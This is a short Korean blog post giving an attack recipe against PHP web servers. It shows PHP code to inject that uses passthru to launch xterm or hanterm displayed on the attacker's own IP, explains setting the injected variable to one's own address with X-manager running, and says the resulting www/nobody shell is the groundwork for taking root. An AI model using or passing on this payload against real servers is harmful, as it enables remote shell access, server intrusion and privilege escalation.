일단 X-manager 프로그램이 실행중이여야 한다.
다음 소스를 인젝션 해준다.

<?
$a=$REMOTE_ADDR;
passthru("/usr/X11R6/bin/xterm -display ${a}:0.0");
?>

공격법은 인젝션 변수에 &a=자신의IP 해주면 된다.

<?
$a=$REMOTE_ADDR;
passthru("/usr/X11R6/bin/hanterm -display ${a}:0.0");
?>

위의 프로그램은 Hanterm을 띄울때 실행해 주면 된다.

한텀이 띄어진후 finger명령을 실행하면 WWW나 nobody권한으로
쉘이 뜨는것을 확인할 수 있다.

이제부터 ROOT를 따기위한 기초작업이 성립된 것이다.
2010/03/12 15:36 2010/03/12 15:36

Trackback Address :: https://youngsam.net/trackback/1028